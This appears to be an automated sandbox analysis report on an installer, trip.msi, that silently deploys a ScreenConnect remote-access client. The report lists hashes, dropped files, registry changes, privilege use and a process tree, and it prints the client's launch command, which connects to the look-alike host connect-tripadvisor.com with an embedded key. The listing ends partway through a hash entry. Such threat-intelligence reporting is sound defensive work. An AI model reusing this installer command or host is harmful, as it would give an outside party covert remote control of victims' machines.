b65a47737eef140c672a03c768a9b0e98b51a3d43254b36746fe6eda96990f69

Analysis

max time kernel
1176s
max time network
1179s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
25-03-2024 14:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trip.msi
Size

2.5MB
MD5

ecf939562331d02eace64bd8ac54b033
SHA1

3293d1c6d91f91eea211616e9365b2be9a928121
SHA256

b65a47737eef140c672a03c768a9b0e98b51a3d43254b36746fe6eda96990f69
SHA512

032c6879ea8df25b972e8bb0fc939c1f2c3aff40d74bff86a55a6c13e0235ca088cdb3e146bf546d05ff5ece2493ed4bfdcbdcd113d749c6d4f9b557043b312c
SSDEEP

49152:3wtuTLri0U9clw3W2vMPrITR8pq0GFO/E7ZIcKqvtdAoSh636PYp1g:gtuTvjUUw3W2vMMqbGoc9IES3hxPM

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe

Drops file in Windows directory 20 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e575023.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e575023.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\{3857C70D-03D7-47D4-AF80-E94474C0AE4E}\DefaultIcon	msiexec.exe
File created	C:\Windows\Installer\SourceHash{3857C70D-03D7-47D4-AF80-E94474C0AE4E}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI50C0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DFB37B588BF7B5CAAB.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF4D2AB3A42F4F03CA.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI511F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5130.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI51CD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI521C.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF125EA2E3976CB298.TMP	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI50D0.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{3857C70D-03D7-47D4-AF80-E94474C0AE4E}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\e575025.msi	msiexec.exe
File created	C:\Windows\Installer\{3857C70D-03D7-47D4-AF80-E94474C0AE4E}\DefaultIcon	msiexec.exe
File created	C:\Windows\SystemTemp\~DF7B4627D8CD6AC645.TMP	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
3160	ScreenConnect.ClientService.exe
3004	ScreenConnect.WindowsClient.exe

Loads dropped DLL 23 IoCs

pid	Process
1052	MsiExec.exe
864	rundll32.exe
864	rundll32.exe
864	rundll32.exe
864	rundll32.exe
864	rundll32.exe
864	rundll32.exe
864	rundll32.exe
984	MsiExec.exe
984	MsiExec.exe
984	MsiExec.exe
4000	MsiExec.exe
4000	MsiExec.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000239892d157dd5a9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000239892d10000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900239892d1000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d239892d1000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000239892d100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E	msiexec.exe

Modifies registry class 32 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\ProductIcon = "C:\\Windows\\Installer\\{3857C70D-03D7-47D4-AF80-E94474C0AE4E}\\DefaultIcon"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\ProductName = "ScreenConnect Client (d99ea53d69ff0bee)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (d99ea53d69ff0bee)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\PackageCode = "659B838C479AA6F49870983AFB38DA1E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D07C75837D304D74FA089E44470CEAE4\Full	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FE95885AED2AF4C99DE95AD396FFB0EE	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\PackageName = "trip.msi"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-d99ea53d69ff0bee\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-d99ea53d69ff0bee	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FE95885AED2AF4C99DE95AD396FFB0EE\D07C75837D304D74FA089E44470CEAE4	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Version = "369500690"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D07C75837D304D74FA089E44470CEAE4	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2044	msiexec.exe
2044	msiexec.exe
3160	ScreenConnect.ClientService.exe
3160	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4956	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4956	msiexec.exe
Token: SeSecurityPrivilege	2044	msiexec.exe
Token: SeCreateTokenPrivilege	4956	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4956	msiexec.exe
Token: SeLockMemoryPrivilege	4956	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4956	msiexec.exe
Token: SeMachineAccountPrivilege	4956	msiexec.exe
Token: SeTcbPrivilege	4956	msiexec.exe
Token: SeSecurityPrivilege	4956	msiexec.exe
Token: SeTakeOwnershipPrivilege	4956	msiexec.exe
Token: SeLoadDriverPrivilege	4956	msiexec.exe
Token: SeSystemProfilePrivilege	4956	msiexec.exe
Token: SeSystemtimePrivilege	4956	msiexec.exe
Token: SeProfSingleProcessPrivilege	4956	msiexec.exe
Token: SeIncBasePriorityPrivilege	4956	msiexec.exe
Token: SeCreatePagefilePrivilege	4956	msiexec.exe
Token: SeCreatePermanentPrivilege	4956	msiexec.exe
Token: SeBackupPrivilege	4956	msiexec.exe
Token: SeRestorePrivilege	4956	msiexec.exe
Token: SeShutdownPrivilege	4956	msiexec.exe
Token: SeDebugPrivilege	4956	msiexec.exe
Token: SeAuditPrivilege	4956	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4956	msiexec.exe
Token: SeChangeNotifyPrivilege	4956	msiexec.exe
Token: SeRemoteShutdownPrivilege	4956	msiexec.exe
Token: SeUndockPrivilege	4956	msiexec.exe
Token: SeSyncAgentPrivilege	4956	msiexec.exe
Token: SeEnableDelegationPrivilege	4956	msiexec.exe
Token: SeManageVolumePrivilege	4956	msiexec.exe
Token: SeImpersonatePrivilege	4956	msiexec.exe
Token: SeCreateGlobalPrivilege	4956	msiexec.exe
Token: SeCreateTokenPrivilege	4956	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4956	msiexec.exe
Token: SeLockMemoryPrivilege	4956	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4956	msiexec.exe
Token: SeMachineAccountPrivilege	4956	msiexec.exe
Token: SeTcbPrivilege	4956	msiexec.exe
Token: SeSecurityPrivilege	4956	msiexec.exe
Token: SeTakeOwnershipPrivilege	4956	msiexec.exe
Token: SeLoadDriverPrivilege	4956	msiexec.exe
Token: SeSystemProfilePrivilege	4956	msiexec.exe
Token: SeSystemtimePrivilege	4956	msiexec.exe
Token: SeProfSingleProcessPrivilege	4956	msiexec.exe
Token: SeIncBasePriorityPrivilege	4956	msiexec.exe
Token: SeCreatePagefilePrivilege	4956	msiexec.exe
Token: SeCreatePermanentPrivilege	4956	msiexec.exe
Token: SeBackupPrivilege	4956	msiexec.exe
Token: SeRestorePrivilege	4956	msiexec.exe
Token: SeShutdownPrivilege	4956	msiexec.exe
Token: SeDebugPrivilege	4956	msiexec.exe
Token: SeAuditPrivilege	4956	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4956	msiexec.exe
Token: SeChangeNotifyPrivilege	4956	msiexec.exe
Token: SeRemoteShutdownPrivilege	4956	msiexec.exe
Token: SeUndockPrivilege	4956	msiexec.exe
Token: SeSyncAgentPrivilege	4956	msiexec.exe
Token: SeEnableDelegationPrivilege	4956	msiexec.exe
Token: SeManageVolumePrivilege	4956	msiexec.exe
Token: SeImpersonatePrivilege	4956	msiexec.exe
Token: SeCreateGlobalPrivilege	4956	msiexec.exe
Token: SeCreateTokenPrivilege	4956	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4956	msiexec.exe
Token: SeLockMemoryPrivilege	4956	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4956	msiexec.exe
4956	msiexec.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2044 wrote to memory of 1052	2044	msiexec.exe	79
PID 2044 wrote to memory of 1052	2044	msiexec.exe	79
PID 2044 wrote to memory of 1052	2044	msiexec.exe	79
PID 1052 wrote to memory of 864	1052	MsiExec.exe	80
PID 1052 wrote to memory of 864	1052	MsiExec.exe	80
PID 1052 wrote to memory of 864	1052	MsiExec.exe	80
PID 2044 wrote to memory of 1792	2044	msiexec.exe	84
PID 2044 wrote to memory of 1792	2044	msiexec.exe	84
PID 2044 wrote to memory of 984	2044	msiexec.exe	86
PID 2044 wrote to memory of 984	2044	msiexec.exe	86
PID 2044 wrote to memory of 984	2044	msiexec.exe	86
PID 2044 wrote to memory of 4000	2044	msiexec.exe	87
PID 2044 wrote to memory of 4000	2044	msiexec.exe	87
PID 2044 wrote to memory of 4000	2044	msiexec.exe	87
PID 3160 wrote to memory of 3004	3160	ScreenConnect.ClientService.exe	89
PID 3160 wrote to memory of 3004	3160	ScreenConnect.ClientService.exe	89

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\trip.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4956

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 00A1878C5E4AB42DEE05C39A5B8F0A85 C
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1052
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3A1B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240597703 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    PID:864
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:1792
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0895C68DF02AAAA42087F36651709ED4
  2⤵
  - Loads dropped DLL
  PID:984
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding DD2F4767E0D4A0243C39F6A2B2EF0248 E Global\MSI0000
  2⤵
  - Drops file in Windows directory
  - Loads dropped DLL
  PID:4000

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4500

C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=connect-tripadvisor.com&p=443&s=7817b97d-45bf-47b1-a849-ff629d652cc9&k=BgIAAACkAABSU0ExAAgAAAEAAQCxEP5Q5dY4dsd2WT0OF5M02NRSLwvHK%2b2gGrPnmXE%2bdjK66JHBg%2fOV974GClUfv92JP70R5rrdM5T%2f6RJhXpaPyovS5HRdSWayUDPDOuWwKTU5C2bwDJen%2be5gCJSSc5SS3NM%2bMR45m8a7Pfn%2fo3PhZxmUp60nGraMvVCU7VzZjbe6obzQ0ssurK8jh0vLGx5%2bqAnuKvpQRSTVkO8Jxn7R9WUkjXWbspN%2bvV4Zctr3RFgUv0em7Dv%2biktj7RlINLPGxSfwDCTHUggef%2bkfVFIVBGxPqiKD4yv9ZF3CHITonYLsDO99nuJOJHorUCra%2f7kb8%2fePltzQ8Q4f4kXoTHfY&t=&c=&c=&c=&c=&c=&c=&c=&c="
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe" "RunRole" "cc84c798-cc4a-46b2-9bfc-26025441df30" "User"
  2⤵
  - Executes dropped EXE
  PID:3004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e575024.rbs

Filesize
212KB

MD5
2e54c9e9ab557ad6bc0cbb0fab9e6577

SHA1
f8444d1560e77c7bb8b5c3acec5ddfceef81a8e2

SHA256
52313d18b01a16a3c27c351296b9bdcf30a44a1bf8db3ace14429cde6f669ccc

SHA512
209770393400a70311a960ef8df9df365d19ad962656db71be04dc92e8e0e31cd6df4708f98caabf0ef0b150b3f0dd36ab31e37fd2042e5cb51036d321a0aea4

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.en-US.resources

Filesize
42KB

MD5
20518e7d17ee442c745f09cd223f1f58

SHA1
5790c9ab42775e65107c07e44f0ec955acc3aa4d

SHA256
715cea8a7c4544691c00ee22a93cd42889e433f95786a2c509aa8ad10b3b316e

SHA512
51219703473fd9e6ab21e7629c11a5891d47920be46cca96beacb4292a131a0733acafa8c438cc6552e06db9d1089d52b8ddcf032676e9e93fd64d45daf82644

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.resources

Filesize
2KB

MD5
0b47901f2c782922f034fba8e8062916

SHA1
893075f8ca04f92dbef7f6e81223e1b08e29328f

SHA256
64da2cfeacfcba97cad701da9288618bc42a20f69dd4a0fe5652ce49ef92524c

SHA512
b3db1c4ffed1dbaef5e03f4819bcba5f0a6864c26123e059b6a649911adbd380ae3aa1eb63c2397ea1ea5fc61103468b5db838080d7c7d5de848b5002c31cbd6

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Client.dll

Filesize
174KB

MD5
53f4028f53716457d2f4ecd88153ee28

SHA1
6ba080b54774194929deb2dbeb07870de4c6fd94

SHA256
020abca409831487d12103e63236ce4e3437c11748ba21838694ab4e945a34d1

SHA512
1f09ec6ed90735a028f042b6900029c2c7696e76cb5c5b53357d0ba72dad01c5afa9cba8f8262e57d84f4d4ed252063e24e472381eba1bfabe7c0b533182984d

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.dll

Filesize
35KB

MD5
e5437673f01321bce36de3d3c64dfd1c

SHA1
2fd3da4b0320042465c4f2ad2afde3e80686012b

SHA256
de7bcf5d9af680f6534477cfe842d5790662b717e61f3579483beddf3020be55

SHA512
d36d464bc04eb5d6a74975128b83034c80fa1a502b436a469e1a3803f918ae0f6ab712b29f56136ae4c2726b30bc33de0a693b1a3d8e81d1faa242341104245f

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe

Filesize
93KB

MD5
513f2d59390eac20cb80876f92c6c079

SHA1
5e806426e48401e4c286e3de64ccbeb4555c4c16

SHA256
851211a77cb938257f5d1fed9385662f0ba0d47442108caf802f6fbc5d72ca02

SHA512
2192a700fc1ae17b05b076d28bd89b6d1d7ff2dfdeabff4f50d0d64084f8a242293cd8f8b479bf39fe1dace97c2b0548f055647134d25cae2ad5f9bf15ea6cd3

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Windows.dll

Filesize
1.3MB

MD5
cb5dcff25fdd49844db3ecabd4db8596

SHA1
59b0c84f0258fc502e8c07a803e0788fac59e04d

SHA256
da1a6b26a65ad07d78d2ac83caf16611fd187e5baee48094f8fc520d8d716e65

SHA512
b0376843d793219ddf4633eeea33c293a4fe729825622c01bd1e0d651073f3aae227b4a1646a8286184e6ed707ce6764f001f3a0e7801222298aebf9cf6721e0

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Windows.dll

Filesize
1.3MB

MD5
666ccee5acb3aff03f9a39383507aae1

SHA1
866a07bad334ec329c0fc87a5f7c258c6cf11cb2

SHA256
08462227c26a3c193940a25f4e1009d1a7b963635cc9682856f9300046f18b0e

SHA512
0b6ef2abbf5c3e2e28120ab2ae2937bd05357cee09bbb6b3974c2b56c6a048a428cb6b6289dc9d1bcf854cfe785e27946eaaf01c36ead86639ed33f4530da8a9

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Windows.dll

Filesize
1.3MB

MD5
264b7edeef117f4b05332ab54963952d

SHA1
57fc6bd6bcf331d7947c9e783acc04c9324b3842

SHA256
89bedbbb6fec8fae46c8e5f408b1aaa4236dc8dabef5bfca12d9d1ae705e0f3f

SHA512
